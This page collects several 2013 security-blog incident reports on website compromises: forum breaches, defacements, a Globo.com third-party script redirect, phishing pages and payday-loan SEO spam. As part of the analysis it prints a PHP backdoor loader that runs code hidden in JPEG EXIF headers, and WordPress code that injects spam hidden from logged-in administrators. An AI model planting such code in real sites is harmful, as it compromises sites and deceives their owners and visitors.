Ubuntu Forums Hacked

Ubuntu’s official forum web site (ubuntuforums.org) was hacked, defaced and all user names and
passwords stolen. The forum was very popular with over 1.8 million registered users. The site is now disabled with this warning:

What we know:

-Unfortunately the attackers have gotten every user’s local username, password, and email address from the Ubuntu Forums database.

-The passwords are not stored in plain text. However, if you were using the same password as your Ubuntu Forums one on another service (such as email), you are strongly encouraged to change the password on the other service ASAP.

The site was running vBulletin and according to some sources, it was outdated and didn’t have the admin panel protected. During the time it was defaced, it was redirecting to “ubuntuforums.org/signaturepics/Sput.html”, which had this image:

Ubuntu forums hacked

Size of the attack and consequences

The Ubuntu forum was very large with over 1,800,000 registered members. Even though the passwords were not stored in plain text, they should be considered compromised and known by the attackers. And since the site used vBulletin, it is likely that they were just hashed with md5, which makes the job a lot easier to the attackers.

If you have an account there and you use the same password some where else, please
change the password asap.

Malware Hidden Inside JPG EXIF Headers

A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. This backdoor didn’t rely on the normal patterns to hide its content (like base64/gzip encoding), but stored its data in the EXIF headers of a JPEG image. It also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.

Technical Details

The backdoor is divided into two parts. The first part is a mix of the exif_read_data function to read the image headers and the preg_replace function to execute the content. This is what we found in the compromised site:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');


Read More

vBulletin Infections from Adabeupdate

vBulletin is a popular forum platform that is also starting to become a popular target for web attacks. vBulletin (and vbSEO) had some serious security vulnerabilities in older versions, and when a forum using them is not properly updated, it ends up hosting malware like the one we will analyze here in this post.

vBulletin in SiteCheck

Technical Analysis

vBulletin is very unique on how it stores its templates and plugins, It’s different than WordPress and Joomla, all the content is saved in the database. That makes it a bit more complicated for webmasters because they can’t just use common command line tools (like grep) to search through all their files. They need to use phpMyAdmin or another database tool to try to find and fix those issues.

Read More

Brazilian Protests Leading to Mass Defacements

Lately, Brazil is going through a series of political protests against the current administration and the large amount of over expenses related to the 2014 Soccer/FIFA World cup. When the police started to close down the protesters in the streets, they went online. We won’t go into much more politics, but those online protests recently switched from Twitter/Facebook discussions into a mass defacement of multiple high profiles sites (and Twitter accounts).

It includes the Twitter of the Veja Magazine (with over 2.5m followers – one of the biggest in Brazil):

Revista Veja compromised

And the site for Brazilian’s richest man, Eike Batista:

Screen Shot 2013-06-17 at 5.09.36 PM

Government sites affected too

And that’s not all, many government sites are getting hacked and defaced as part of the protest. All of them begging for the population to join them in the streets and in front of the soccer stadiums to show their dissatisfaction with what is happening. This is a small list of the ones defaced early today:

http://samu192.com.br/

http://www.juazeirinho.pb.gov.br/

http://www.camaradocabo.pe.gov.br/

http://www.macaeprev.rj.gov.br/

http://www.ciscel.mg.gov.br/

http://copa2014.gov.br/

http://www.saofelixdoaraguaia.mt.gov.br/

http://copaemcuiaba.com.br/

http://www.frentedetrabalho.sp.gov.br

We are also seeing some sites suffering from DDOS (denial of service) attacks. We don’t know exactly how those sites are getting hacked, but we will keep monitoring the situation and providing updates as they come. Note that none of the compromised sites were injected to host malware.

Globo.com redirecting users to Spam ads

Globo.com, one of the largest Brazilian web portals (ranked #107 on Alexa and #6 for Brazilian traffic) appears to be compromised and all visits to it are being redirected to a sub page inside pagesinxt.com. If you go to g1.globo.com (or any other of their sub domains), you will end up on a page full of ads about Hosting, Internet and fake email products:

Globo.com redirection

That redirection has been going for a few hours at least and we detected it for the first time around 8am EST and it is still live four hours later (noon EST).

What is going on?

We are investigating, but at the bottom of any page inside google.com there is a script being loaded from sawpf.com:

<script defer src="httx://sawpf.com/1.0.js"></script>

That javascript file is being very slow to load, but when it does, it runs the following code:

 window.location = httx://pagesinxt.com/?dn=sawpf.com&fp=3WBUwymfgey…

Which forces the browser to redirect the to pagesinxt.com. At this point, we recommend all users to do not visit any globo.com page (or go there with Javascript disabled).

Who really owns your site?

This brings up a good topic that we brought up before. Who really owns your site? Every time you include a javascript (or widget or iframe), the security of your site becomes dependent on that third party server. It doesn’t looks like Globo in itself got compromised, but since they are including code from sawpf.com, they are only as secure as them.

Every time you add a remote JavaScript (or widget or iFrame) to your site, you are giving the server that houses that code full control of what is displayed to your users. If their servers get compromised, your site will be compromised as well.

Can you imagine if the author of the Easing Plugin was malicious? Instead of just that pop-up, they could have added a URL redirect to send all your users to any site they of their choosing (SPAM, porn, you name it). What if their server was hacked? The attackers could have added malware and it would have loaded to all your users.

*update 1: Lots of users on Twitter are complaining about it as well. Search for sawpf or pagesinxt to see the amount of people complaining or worried about it.

*update 2: If you click on some urls inside sawpf.com, you will be redirected to pagesinxt.com as well ( for example: httx://sawpf.com/libs/jquery/1.7.1.js )

LivingSocial Hacked — More Than 50 Million Accounts Compromised

Just as we were thinking we were going to avoid any major enterprise compromises this week, LivingSocial announces that it has been compromised and some 50 million accounts have been compromised. Based on the reports, it doesn’t seem that any financial data is at risk, but things like usernames and passwords are all fair game.

To put this into perspective, if you think back to last years major compromise, LinkedIn, that was only 6 million accounts. The data compromised here is about 8.5 times that size.

That’s pretty freaking big.

Read More

Mass WordPress Brute Force Attacks? – Myth or Reality

We are seeing in the media some noise about a large distributed brute force attacks against all hosts targeting WordPress sites. According to reports, they are seeing a large botnet with more than 90,000 servers attempting to log in by cycling different usernames and passwords against the WordPress access points: /wp-login.php and /wp-admin.

This got us thinking, well we block a lot of attacks why not look at the logs to see what they tell us. So we did.

The Data

Looking back, we can see in our historical database the following:

2012/Dec: 678,519 login attempts blocked

2013/Jan: 1,252,308 login attempts blocked (40k per day)

2013/Feb: 1,034,323 login attempts blocked (36k per day)

2013/Mar: 950,389 login attempts blocked (31k per day)

2013/Apr: 774,104 for the first 10 days – 77,410 per day


Read More

UNICAMP – Used to Host Phishing Pages

We just discovered that UNICAMP (Universidade Estadual de Campinas), a renowned Brazilian University, has had their infrastructure compromised and it is being used to host phishing link which are then being used email spear phishing campaigns.

In this specific campaign they appear to be targeting a visitors credit card information. We came across the issue while working on an infected site. The attacker had modified the site’s .htaccess to redirect incoming traffic to the Phishing files:

hxxp://www.cpa.unicamp.br/alcscens/as/public.php (The URL was slightly modified to avoid accidental clicks)

This link was leading to the following URL which is still live. The content looks to have been cleared up:

hxxp://www0.comprapremiadacielo.web-maker.kz/

This was a phishing page pretending to be from Cielo, one of the biggest electronic payments operators in Brazil. It was pretending to offer promotions and discounts that requested the visitors credit card information.

Here’s an image of the phishing page:

cielo-phishing

We also found a file containing an email message and script to send emails to potential victims. Here’s the content of the email file:

httx://www. cpa.unicamp.br/alcscens/as/public.phpios%20autenticado&pbx=1&oq=&aq=&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2%2cor.r_gc.r_pw.%2ccf.osb&fp=aa151a29d476e27c&pf=p&pdl=500
Caso não esteja vendo as imagens desse e-mail, click aqui: http://www.cpa.unicamp.br/alcscens/as/public.php

While there does not appear to be any evidence of other nefarious activities on the site, it is still best practice to avoid the site until the University has an opportunity to clean themselves up.


Written by Magno Logan and Fio.

Payday Loan Spam affecting Thousands of Sites

One of the most important metrics used by search engines to rank a site is the number of link backs that it has. The more links a site has for a specific keyword, the higher it will rank when someone searches for it. So if a site has a lot of links back for a keyword (say “loan”), if someone searches for “loan” it will rank very high.

That’s where SPAM SEO (Search Engine Optimization) comes int play. Instead of building content and growing a site to organically receive links back, criminals (yes, anyone that hacks someone’s else site for monetary gain is a criminal) will hack into websites and inject links that will target specific keywords.

Those links will then point to a website controlled by the attacker[s] that they want to have better ranking. Very often those links are conditional (only displayed for search engine bots) and hard to detect without a specialized scanning tool.

Payday Loan Spam

We see all types of SPAM, the most common used to be about pharma products (like Viagra  or Cialis), Cassinos online and pornographic pages. Lately, however, we have started to see a sharp increase in the number of sites injected with payday loan and money borrowing services.

The SPAM in it of itself once displayed is very simple, all it does is add a hidden link to a site to offer loans. Similar to:

<a href="httx://payday-all.co.uk/” title="Pay Day Loans Uk”>pay day loans uk</a>

When Google (or Bing) visits the compromised site it will see the link to payday-all.co.uk and increase the PR (page rank) for payday-all.co.uk. As more sites get infected and linking to payday-all, the better it will rank for keywords like “UK Pay day loan”.

Note that this type of spam is not new and we first blogged about it last year: Website Malware – Sharp Increase in SPAM Attacks – WordPress & Joomla, explaining how they were being hidden inside WordPress sites.

Over the past year, this campaign continues to grow and evolve and their techniques have also matured.

Payday Loan Spam – The domains

Most of the payday spam we are tracking seems to end in one of the following domains (by a company called Cash Advance Online or Pay Day Online):

http://paydayloansyouknow.com.au/ (216.172.52.62)
http://paydayloanstores88paycheck.com/ (216.172.52.62)
http://quickcashnowgjyourself.com/ (216.172.52.64)
http://getin10minpaydayloans.com/ (216.172.52.64)
http://cheappaydayadvancevcadvanc.com (216.172.52.64)
http://cashadvancelocationsndbusiness.com (216.172.52.64)
http://findcashadvancefor.me/ (216.172.52.63)
http://findcashadvancenow4.me/ (216.172.52.64)
http://paydayloanlendersxocomprehensive.com/ (216.172.52.60)
http://personalcashloans64long.com/ (216.172.52.67)
http://loanstillpaydayncwith.com (216.172.52.67)
http://kopainstallmentpaydayloansonline.com (216.172.52.67)
http://ukropinstantloans.com (64.191.79.185)
http://pincashadvance.com (64.191.79.185)
http://perapaydayloansonline.com (64.191.79.185)
http://kopainstallmentpaydayloansonline.com/ (64.191.79.185)
http://loronlinepersonalloans.com/ (50.115.172.170)
http://inapersonalloans.com/ (50.115.172.24)
http://paydayloans10dokp.com/ (109.206.176.120)
http://paydayloans10tilp.com/ (173.214.248.102)
http://paydayloans10ukhw.com/ (173.214.248.100)
http://paydayloansthis.com/ (109.206.176.19)
http://www.payday-hawk.co.uk/ (184.173.197.237)
http://paydayloansfromnowon.com/ (109.206.176.11)
http://cash-loans247.co.uk/ (37.1.209.107)
http://payday-all.co.uk/ (37.1.209.107)

Here are some quick stats on the IPs above:

109.206.176.11	1
109.206.176.120	1
109.206.176.19	1
173.214.248.100	1
173.214.248.102	1
184.173.197.237	1
216.172.52.60	1
216.172.52.62	2
216.172.52.63	1
216.172.52.64	5
216.172.52.67	3
37.1.209.107	2
50.115.172.170	1
50.115.172.24	1
64.191.79.185	4

and

109.206.176	3
173.214.248	2
184.173.197	1
216.172.52	12
37.1.209	2
50.115.172	2
64.191.79	4

Their templates all look the same, they try to convince the user to sign up and register with them to be pre-approved for a loan. This is the common landing page for Cash Advance Online:

Cash spam

And this is the template for Pay Day Online:

Spam cache 2

As you can see, a good and clean designed page trying to convince the user to sign up. What’s scary is the number of sites linked to them. If you do some searches on Google for the specific keywords they use:

“payday loans massachusetts” OR
“payday loan bad credit” OR
“business cash advance loans” OR
“No Fax Payday Loan”

You will find hundreds of thousands of pages linking to them. All from unrelated sites ranging from personal blogs, government sites, forums and universities.

Applying for a loan

After seeing so many sites with this spam, I felt compelled to see if can get a loan. So, I decided to try a few of them to see what would happened.

First, I filled the form that asked for a lot of personal information (Name, Address, email, Social security number, Bank information, etc). All of them denied me and redirected me to altohost.com, which in turn redirected me again to lenditfinancial.com.

http://getin10minpaydayloans.com/apply ->
https://altohost.com/system/thank.you.page/click.php?id=2610 ->

https://www.lenditfinancial.com/newcode/step2.php?referid=T3

Altohost is part of t3leads.com (affiliate marketing/tracking), so it seems the attackers are building this network of spam sites to redirect users to legitimate payment companies that offer affiliate commission (lendit Financial). Always about the money.

Payday Loan Spam – The hiding spot

As we said before, most of the spam is conditional, so a normal user visiting the site won’t see them. Only search engines (like Google or Bing) will see the malicious links added there. In addition to being conditional, the spam is also hidden via javascript. So if you are using a browser with javascript enabled, the spam will not show up.

This is the javascript used to hide the spam (that is also flagged by sitecheck):

SPAM seo push

And the attackers to do not stop there. On a WordPress site, they add the following piece of code (or similar) to inject the spam:

function b_call($b) {
if (!function_exists(“is_user_logged_in”) || is_user_logged_in() || !($m = get_option(“_metaproperty”))) {
return $b;
}
list($m, $n) = unserialize(trim(strrev($m)));
$b = preg_replace(“~<body[^>]*>~”, ‘\\0′.”\n”. $n .”\n”, $b);
$b = str_ireplace(“</head>”, $m.”\n</head>”, $b);
return $b;
}
function b_start() {
ob_start(“b_call”);
}
function b_end() {
ob_end_flush();
}
add_action(“wp_head”, “b_start”);
add_action(“wp_footer”, “b_end”);

Which will hide the code from anyone that is logged in (administrators of the site) and only display to the others. The spam content is also hidden inside the _metaproperty option inside the wp_options table.

The code changes at each new cycle of the spam, but the idea is the same. Make it harder for the owner of the site to detect and at the same time display the spam links to search engine bots.

Who is behind

It is very hard to point a specific organization or person responsible for those spam injections. The whois from all the domains is hidden and they seem to use quite a range of IP addresses. From our tests, they are pointing to affiliate links to try to make commission money from legitimate companies. So the only real way to track them is going after the legitimate lending companies and track who they are paying the money to.

NBC Website HACKED – Be Careful Surfing

Breaking, the NBC site is currently compromised and blacklisted by Google. Anyone that visits the site (which includes any sub page) will have malicious iframes loaded as well redirecting the user to exploit kits (Redkit):

*Update: Not only NBC.com, but many other NBC sites, including Late Night with Jimmy Fallon, Jay Lenos garage and others.

Screen Shot 2013-02-21 at 11.15.51 AM

If you are visiting it from Chrome or Firefox would get the following warning:

Screen Shot 2013-02-21 at 11.18.14 AM

Read More